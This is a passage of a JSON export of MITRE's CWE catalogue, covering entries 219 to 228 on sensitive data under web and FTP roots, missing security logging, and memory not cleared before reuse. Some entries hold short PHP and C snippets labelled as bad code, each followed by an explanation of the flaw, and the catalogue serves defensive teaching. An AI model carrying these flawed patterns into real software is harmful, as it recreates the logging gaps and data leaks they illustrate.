root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2217"},{"Reference":"CVE-2002-1449","Description":"Username/password in data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1449"},{"Reference":"CVE-2002-0943","Description":"Database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0943"},{"Reference":"CVE-2005-1645","Description":"database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1645"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under Web Root"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under Web Root","attr":{"@_Date":"2020-02-24"}}}},"220":{"attr":{"@_ID":"220","@_Name":"Storage of File With Sensitive Data Under FTP Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Various Unix FTP servers require a password file that is under the FTP root, due to use of chroot."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the FTP root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under FTP Root"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under FTP Root","attr":{"@_Date":"2020-02-24"}}}},"221":{"attr":{"@_ID":"221","@_Name":"Information Loss or Omission","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.","Extended_Description":"This can be resultant, e.g. a buffer overflow might trigger a crash before the product can log the event.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information loss or omission"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"222":{"attr":{"@_ID":"222","@_Name":"Truncation of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0585","Description":"Web browser truncates long sub-domains or paths, facilitating phishing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0585"},{"Reference":"CVE-2004-2032","Description":"Bypass URL filter via a long URL with a large number of trailing hex-encoded space characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2032"},{"Reference":"CVE-2003-0412","Description":"Does not log complete URI of a long request (truncation).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0412"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Truncation of Security-relevant Information"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"223":{"attr":{"@_ID":"223","@_Name":"Omission of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code logs suspicious multiple login attempts.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($userName,$password){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(authenticate($userName,$password)){}else{}","xhtml:div":[{"#text":"return True;","attr":{"@_style":"margin-left:10px;"}},{"#text":"incrementLoginAttempts($userName);if(recentLoginAttempts($userName) &gt; 5){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"writeLog(\\"Failed login attempt by User: \\" . $userName . \\" at \\" + date(\'r\') );","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":""}}}},"Body_Text":"This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1029","Description":"Login attempts not recorded if user disconnects before maximum number of tries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1029"},{"Reference":"CVE-2002-1839","Description":"Sender\'s IP address not recorded in outgoing e-mail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1839"},{"Reference":"CVE-2000-0542","Description":"Failed authentication attempt not recorded if later attempt succeeds.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0542"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Omission of Security-relevant Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Accountability&#34;, Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"224":{"attr":{"@_ID":"224","@_Name":"Obscured Security-relevant Information by Alternate Name","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records security-relevant information according to an alternate name of the affected entity, instead of the canonical name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();$realFile = $filename;if(is_link($filename)){}if(fileowner($realFile) == $user){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$realFile = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';writeLog($user . \' attempted to access the file \'. $filename . \' on \'. date(\'r\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363)."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0725","Description":"Attacker performs malicious actions on a hard link to a file, obscuring the real target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obscured Security-relevant Information by Alternate Name"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"225":{"attr":{"@_ID":"225","@_Name":"DEPRECATED: General Information Management Problems","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-199.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): General Information Management Problems","attr":{"@_Date":"2021-07-20"}}}},"226":{"attr":{"@_ID":"226","@_Name":"Sensitive Information in Resource Not Removed Before Reuse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or \\"zeroize\\" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities.","Extended_Description":{"xhtml:p":["When resources are released, they can be made available for reuse. For example, after memory is de-allocated, an operating system may make the memory available to another process, or disk space may be reallocated when a file is deleted. As removing information requires time and additional resources, operating systems do not usually clear the previously written information.","Even when the resource is reused by the same process, this weakness can arise when new data is not as large as the old data, which leaves portions of the old data still available. Equivalent errors can occur in other situations where the length of data is variable but the associated data structure is not. If memory is not cleared after use, the information may be read by less trustworthy parties when the memory is reallocated.","This weakness can apply in hardware, such as when a device or system switches between power, sleep, or debug states during normal operation, or when execution changes to different users or privilege levels."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Trigger the release of the resource or cause the desired state transition to occur. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the product needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"During critical state transitions, information not needed in the next state should be removed or overwritten with fixed patterns (such as all 0\'s) or random data, before the transition to the next state.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When releasing, de-allocating, or deleting a resource, overwrite its data and relevant metadata with fixed patterns or random data. Be cautious about complex resource types whose underlying representation might be non-contiguous or change at a low level, such as how a file might be split into different chunks on a file system, even though \\"logical\\" file positions are contiguous at the application layer. Such resource types might require invocation of special modes or APIs to tell the underlying operating system to perform the necessary clearing, such as SDelete (Secure Delete) on Windows, although the appropriate functionality might not be available at the application layer.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0001","Description":"Ethernet NIC drivers do not pad frames with null bytes, leading to infoleak from malformed packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001"},{"Reference":"CVE-2003-0291","Description":"router does not clear information from DHCP packets that have been previously used","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"},{"Reference":"CVE-2005-1406","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1406"},{"Reference":"CVE-2005-1858","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2005-3180","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3180"},{"Reference":"CVE-2005-3276","Description":"Product does not clear a data structure before writing to part of it, yielding information leak of previously used memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3276"},{"Reference":"CVE-2002-2077","Description":"Memory not properly cleared before reuse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2077"}]},"Functional_Areas":{"Functional_Area":["Memory Management","Networking"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Information Uncleared Before Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":[{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"This entry needs modification to clarify the differences with CWE-212. The description also combines two problems that are distinct from the CWE research perspective: the inadvertent transfer of information to another sphere, and improper initialization/shutdown. Some of the associated taxonomy mappings reflect these different uses.","attr":{"@_Type":"Maintenance"}},{"#text":"This is frequently found for network packets, but it can also exist in local memory allocation, files, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Sensitive Information Uncleared Before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Sensitive Information Uncleared Before Release","attr":{"@_Date":"2020-02-24"}},{"#text":"Sensitive Information Uncleared in Resource Before Release for Reuse","attr":{"@_Date":"2020-08-20"}}]}},"228":{"attr":{"@_ID":"228","@_Name":"Improper Handling of Syntactically Invalid Structure","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"If an input is syntactically invalid, then processing the input could place the system in an unexpected state that could lead to a crash, consume available system resources or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an 